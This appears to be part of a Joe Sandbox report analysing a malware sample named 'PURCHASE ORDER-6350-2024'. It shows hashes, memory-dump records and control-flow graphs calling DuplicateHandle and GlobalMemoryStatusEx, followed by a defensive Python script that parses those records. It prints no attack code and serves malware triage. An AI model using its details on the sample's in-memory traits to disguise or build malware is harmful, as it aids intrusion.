                                                  • Instruction Fuzzy Hash: 63E12E74E002198FCB54DFA9C5809AEFBF2FF89305F248169E815AB356D731A941CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b711a796cbd52d8134185a10bf0512d64eda61da4ffc61f8a9c0014875fac999
                                                  • Instruction ID: cdf22cf5a27486eebead93fcba1c720edfb390d61cc658c48f41437f9722bcf9
                                                  • Opcode Fuzzy Hash: b711a796cbd52d8134185a10bf0512d64eda61da4ffc61f8a9c0014875fac999
                                                  • Instruction Fuzzy Hash: 41E11974E002598FCB14DFA9C5809AEFBF2FF89305F249169D414AB356DB31A942CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd3307cd00dc33a8a3cc2b946482ef4028951ca5202c7cd15269e9beb65f7f56
                                                  • Instruction ID: fb94982ff1044331e3d0fdb013e2dbf05cc20e803168f36d7a675733020a063c
                                                  • Opcode Fuzzy Hash: cd3307cd00dc33a8a3cc2b946482ef4028951ca5202c7cd15269e9beb65f7f56
                                                  • Instruction Fuzzy Hash: 90E12E74E002598FDB14DFA9C5809AEFBF2FF89305F249159E814AB356D731A941CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52abf8aa3dc6982e11379938229b9d9744b0c0050687084e0918d57a857fbb42
                                                  • Instruction ID: 74bce5fd2877f46a42d5ea6ed72203a22bb9b5cd4641e14b5e8773a0453cd122
                                                  • Opcode Fuzzy Hash: 52abf8aa3dc6982e11379938229b9d9744b0c0050687084e0918d57a857fbb42
                                                  • Instruction Fuzzy Hash: 86A18E36E0021A8FCF19DFB5C8485DEBBF2FF84300B1585AAE945AB265DB71E945CB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5395dd388b2b23e39848a85cbfec80ab6fa9fcfafbf35bb92298eb09814436eb
                                                  • Instruction ID: a1ef025ee0cd53d3fb7b64823aff767d4891361c97647e51b7cbde6f4e6fd070
                                                  • Opcode Fuzzy Hash: 5395dd388b2b23e39848a85cbfec80ab6fa9fcfafbf35bb92298eb09814436eb
                                                  • Instruction Fuzzy Hash: 6551EA74E012198BDB14DFA9C5805AEFBF2FF89305F248169D418AB356D7319A42CFA1

                                                  Execution Graph

                                                  Execution Coverage:6.6%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:17
                                                  Total number of Limit Nodes:0
                                                  execution_graph 19385 6723b78 19386 6723b7e GlobalMemoryStatusEx 19385->19386 19388 6723bee 19386->19388 19389 136b4c8 19390 136b50e 19389->19390 19394 136b697 19390->19394 19401 136b6a8 19390->19401 19391 136b5fb 19395 136b71a DuplicateHandle 19394->19395 19396 136b69b 19394->19396 19400 136b7a6 19395->19400 19405 136b27c 19396->19405 19400->19391 19402 136b6a9 19401->19402 19403 136b27c DuplicateHandle 19402->19403 19404 136b6d6 19403->19404 19404->19391 19406 136b710 DuplicateHandle 19405->19406 19408 136b6d6 19406->19408 19408->19391

                                                  Control-flow Graph

                                                  control_flow_graph 1198 136b697-136b699 1199 136b71a-136b71b 1198->1199 1200 136b69b-136b6a2 1198->1200 1201 136b750-136b7a4 DuplicateHandle 1199->1201 1202 136b71d-136b74f 1199->1202 1203 136b6a4 1200->1203 1204 136b6a9-136b6d1 call 136b27c 1200->1204 1206 136b7a6-136b7ac 1201->1206 1207 136b7ad-136b7ca 1201->1207 1202->1201 1203->1204 1208 136b6d6-136b6fc 1204->1208 1206->1207
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0136B6D6,?,?,?,?,?), ref: 0136B797
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3265773483.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1360000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 3acf2d23e084078974018570b169bdc8150d350acff65b6565d11a4c3bcb56c6
                                                  • Instruction ID: b79421b9e12c9ebff79e361d0d060c07991e9ec4872d733da322d8ad53830338
                                                  • Opcode Fuzzy Hash: 3acf2d23e084078974018570b169bdc8150d350acff65b6565d11a4c3bcb56c6
                                                  • Instruction Fuzzy Hash: 2C419C76A002499FCB00CFA9D844ADEBFF5EF48324F28805AE914E7265C7399951DFA0

                                                  Control-flow Graph

                                                  control_flow_graph 1213 136b708-136b70a 1214 136b711-136b714 1213->1214 1215 136b70c-136b70e 1213->1215 1216 136b715-136b7a4 DuplicateHandle 1214->1216 1215->1216 1217 136b710 1215->1217 1218 136b7a6-136b7ac 1216->1218 1219 136b7ad-136b7ca 1216->1219 1217->1214 1218->1219
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0136B6D6,?,?,?,?,?), ref: 0136B797
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3265773483.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1360000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: b34b70906160346834aa338766144cd0a2873a5ac6e8ba5b204e7fe511b4c1b4
                                                  • Instruction ID: 647dddd5897dfc7276c15a8b5de14a3c5f42d7ac91c4858d278e58cab92a83c5
                                                  • Opcode Fuzzy Hash: b34b70906160346834aa338766144cd0a2873a5ac6e8ba5b204e7fe511b4c1b4
                                                  • Instruction Fuzzy Hash: F821C3B59002489FDB10CF9AD984ADEFFF8FB48314F14841AE914A7214D378A944CFA4

                                                   Control-flow Graph
                                                   • Blocks (entry 136b27c), each with its successors:
                                                   • 136b27c-136b7a4 (DuplicateHandle) → 136b7a6-136b7ac, 136b7ad-136b7ca
                                                   • 136b7a6-136b7ac → 136b7ad-136b7ca
                                                   • 136b7ad-136b7ca → (none)
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0136B6D6,?,?,?,?,?), ref: 0136B797
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3265773483.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1360000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: dadfff8d5d8a1e985f3ef6b7afe2631d9f87619107b7a45c5ea8deeb6c40f8ff
                                                  • Instruction ID: a4e7fcda55bb134094630832b2ff57427b02fd73ad645876c0315680cb162fe4
                                                  • Opcode Fuzzy Hash: dadfff8d5d8a1e985f3ef6b7afe2631d9f87619107b7a45c5ea8deeb6c40f8ff
                                                  • Instruction Fuzzy Hash: EA21D2B59002089FDB10CFAAD584AEEFBF8FF48310F14841AE918A7310D379A954CFA4

                                                   Control-flow Graph
                                                   • Blocks (entry 6723b71), each with its successors:
                                                   • 6723b71-6723b76 → 6723b78-6723b7d, 6723b7e-6723bb6
                                                   • 6723b78-6723b7d → 6723b7e-6723bb6
                                                   • 6723b7e-6723bb6 → 6723bbe-6723bec
                                                   • 6723bbe-6723bec (GlobalMemoryStatusEx) → 6723bf5-6723c1d, 6723bee-6723bf4
                                                   • 6723bee-6723bf4 → 6723bf5-6723c1d
                                                   • 6723bf5-6723c1d → (none)
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 06723BDF
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3271154942.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6720000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 4ad858c446490146598dd8012c84dac5703deee0fc4c2acb4c802339d003c9e2
                                                  • Instruction ID: 88124e1e8f01f01c060b3a37674949eb368042a29efe4bb732ea37a077302997
                                                  • Opcode Fuzzy Hash: 4ad858c446490146598dd8012c84dac5703deee0fc4c2acb4c802339d003c9e2
                                                  • Instruction Fuzzy Hash: CD1103B1C0066A9BCB10DF9AC545ADEFBB4FF49720F10816AE818A7241D778A945CFE1

                                                   Control-flow Graph
                                                   • Blocks (entry 6723b78), each with its successors:
                                                   • 6723b78-6723bec (GlobalMemoryStatusEx) → 6723bf5-6723c1d, 6723bee-6723bf4
                                                   • 6723bee-6723bf4 → 6723bf5-6723c1d
                                                   • 6723bf5-6723c1d → (none)
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 06723BDF
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3271154942.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6720000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 74268a0064bb785b15da9f27cfea99582e5bb38f6432a2bc968980fd113ab17e
                                                  • Instruction ID: 6ccdded1e0de4343d84934eb3b8e507bd43d5ec9e5d6b182c975f752fa78d8b4
                                                  • Opcode Fuzzy Hash: 74268a0064bb785b15da9f27cfea99582e5bb38f6432a2bc968980fd113ab17e
                                                  • Instruction Fuzzy Hash: 3411E2B1C0065A9BCB10DF9AC545B9EFBF4BF48320F14816AD818A7240D778A944CFE5
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3265382173.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_122d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9b8f7b3319e671f2118b59ae05599b2978653659e109bfbe1e48868b77006323
                                                  • Instruction ID: f65900ffa012ead2c44519086f68444c54cf2b84a13b55f56d530c304e95b16f
                                                  • Opcode Fuzzy Hash: 9b8f7b3319e671f2118b59ae05599b2978653659e109bfbe1e48868b77006323
                                                  • Instruction Fuzzy Hash: 8A212571514248EFCB15DF68D580B1ABF65FB84314F20C56DD9090B266C37ED507CA61
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3265382173.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_122d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 634656832cced321f66d54f91227026c972f8a55d6c1da0ead7620cc0e8bb7e8
                                                  • Instruction ID: 148fea84590cec5db3c01f46ce93b52a48ad4538cf0bd90b006d8bbb01f5e6c1
                                                  • Opcode Fuzzy Hash: 634656832cced321f66d54f91227026c972f8a55d6c1da0ead7620cc0e8bb7e8
                                                  • Instruction Fuzzy Hash: E32180755083849FCB03CF64D994715BF71EB46314F28C5DAD9898F2A7C33A981ACB62
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3264684345.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_f0d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3c83e1a7afec8ab0ed3c62ca1ceb996644e1011f577167df9e83e35380a372a
                                                  • Instruction ID: 08c7887fb1cc7c5c33483731555acbeb4b0e79222049f94d6d5c622aeccccd11
                                                  • Opcode Fuzzy Hash: a3c83e1a7afec8ab0ed3c62ca1ceb996644e1011f577167df9e83e35380a372a
                                                  • Instruction Fuzzy Hash: E2F062714043449AE7208A56D884B62FFA8EF55734F18C55AED4C4A296C37A9844DAB1
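                                                   The records above are the Joe Sandbox IDA plugin's per-function entries for code recovered from memory dumps. The Python script below is an added example, not part of this report and not Joe Sandbox code: it parses entries in this bullet format, decodes the protection and type fields of the .sdmp file name with the standard Win32 PAGE_* / MEM_* constants (0x40 = PAGE_EXECUTE_READWRITE, 0x20000 = MEM_PRIVATE), and groups API call sites per function. Run over the entries on this page it surfaces two things worth a triage note: every function lives in RWX private memory that is not backed by a PE image (typical of JIT-compiled or unpacked code), and the three DuplicateHandle entries all reference the same call site 0136B797, so they are three entry points into one shared code tail. The dotted layout of the .sdmp name (process index, snapshot, dump id, base, protection, unknown, type, unknown) is an assumption inferred from the values on the page; the sample input is constructed.

```python
"""Triage parser for Joe Sandbox 'Memory Dump Source' function records.
Added example, not Joe Sandbox code. Assumed .sdmp name layout:
proc.snapshot.dumpid.base.protect.<unknown>.type.<unknown>.sdmp;
protect/type are decoded with the Win32 PAGE_* / MEM_* constants."""
import re
from collections import defaultdict

PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                   0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Constructed sample in the page's record format: two DuplicateHandle entries
# sharing one call site, one GlobalMemoryStatusEx entry, one entry with no API.
SAMPLE = """\
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0136B6D6,?,?,?,?,?), ref: 0136B797
Memory Dump Source
• Source File: 00000006.00000002.3265773483.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
Similarity
• API ID: DuplicateHandle
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0136B6D6,?,?,?,?,?), ref: 0136B797
Memory Dump Source
• Source File: 00000006.00000002.3265773483.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
Similarity
• API ID: DuplicateHandle
APIs
• GlobalMemoryStatusEx.KERNELBASE ref: 06723BDF
Memory Dump Source
• Source File: 00000006.00000002.3271154942.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
Similarity
• API ID: GlobalMemoryStatus
Memory Dump Source
• Source File: 00000006.00000002.3265382173.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
Similarity
• API ID:
"""

API_RE = re.compile(r"^• (\w+)\.(\w+)(?:\([^)]*\))?,? ref: ([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^• Source File: (\S+\.sdmp), Offset: [0-9A-Fa-f]+, based on PE: (true|false)$")


def decode_dump_name(name):
    """Return (base, protection name, memory type name) from the dotted .sdmp name."""
    parts = name.split(".")                      # assumed field layout, see docstring
    base, prot, mtype = int(parts[3], 16), int(parts[4], 16), int(parts[6], 16)
    return base, PAGE_PROTECTION.get(prot, hex(prot)), MEM_TYPE.get(mtype, hex(mtype))


def parse_records(text):
    """Parse the bullet records into one dict per analysed function."""
    records, cur, pending = [], None, []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                       # a new record starts with its API list
            cur, pending = None, []
            continue
        m = API_RE.match(line)
        if m:                                    # (api, module, call-site address)
            pending.append((m.group(1), m.group(2), m.group(3).upper()))
            continue
        m = SRC_RE.match(line)
        if m:                                    # the Source File line closes the record header
            base, prot, mtype = decode_dump_name(m.group(1))
            cur = {"apis": pending, "base": base, "protection": prot, "mem_type": mtype,
                   "based_on_pe": m.group(2) == "true", "api_id": ""}
            records.append(cur)
            pending = []
        elif cur is not None and line.startswith("• API ID:"):
            cur["api_id"] = line.split(":", 1)[1].strip()
    return records


def summarize(records):
    """Group call sites and count functions in RWX private memory not backed by a PE."""
    call_sites, apis_by_region, rwx_private = defaultdict(int), defaultdict(set), 0
    for r in records:
        if (r["protection"] == "PAGE_EXECUTE_READWRITE"
                and r["mem_type"] == "MEM_PRIVATE" and not r["based_on_pe"]):
            rwx_private += 1
        for api, _module, ref in r["apis"]:
            call_sites[ref] += 1
            apis_by_region[r["base"]].add(api)
    return {
        "functions": len(records),
        "rwx_private_no_pe": rwx_private,
        "call_sites": dict(call_sites),
        "apis_by_region": {b: sorted(s) for b, s in apis_by_region.items()},
        # one call site listed under several functions = several entry points into one code tail
        "shared_call_sites": sorted(ref for ref, n in call_sites.items() if n > 1),
    }


if __name__ == "__main__":
    s = summarize(parse_records(SAMPLE))
    print(f"{s['functions']} functions, {s['rwx_private_no_pe']} in RWX private memory without PE")
    for base, apis in sorted(s["apis_by_region"].items()):
        print(f"  region {base:08X}: {', '.join(apis)}")
    print("shared call sites:", ", ".join(s["shared_call_sites"]) or "none")
```

                                                   Feed it the text of a whole report section instead of SAMPLE to get the same per-region API list and the set of call sites that appear under more than one function; the regexes only accept the two line shapes shown on this page (an API line with or without an argument list, and a Source File line), so a report field with a different layout is silently ignored rather than misparsed.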